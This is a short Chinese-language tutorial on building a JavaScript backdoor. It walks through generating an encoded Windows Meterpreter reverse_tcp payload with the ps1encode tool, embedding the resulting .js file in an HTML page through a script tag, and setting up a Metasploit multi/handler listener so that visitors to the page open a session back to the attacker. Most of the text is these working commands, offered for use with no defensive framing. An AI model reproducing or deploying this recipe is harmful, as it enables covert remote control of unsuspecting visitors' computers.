JavaScript后门创建与使⽤
前言
今天介绍一种小众的js后门获取shell,使用ps1encode来加密反弹后门。
工具地址:https://github.com/CroweCybersecurity/ps1encode
正文
在文件目录下用下面的命令生成反弹shell的js代码,填入监听机的ip和port
./ps1encode.rb --LHOST [Port] --LPORT [Port] --PAYLOAD windows/meterpreter/reverse_tcp --ENCODE cmd -t js
成功生成js代码
将上面加密后的js代码保存到一个.js的文件中
通过js语法,将刚刚保存的js文件内嵌到html中
<script src="u.js"></script>
此时在msf中开启监听
msf6 > use multi/handler msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set lport 4444 msf6 exploit(multi/handler) > set lhost 192.168.80.131 msf6 exploit(multi/handler) > run当访问带有js的html⽹⻚时,kali成功获取到会话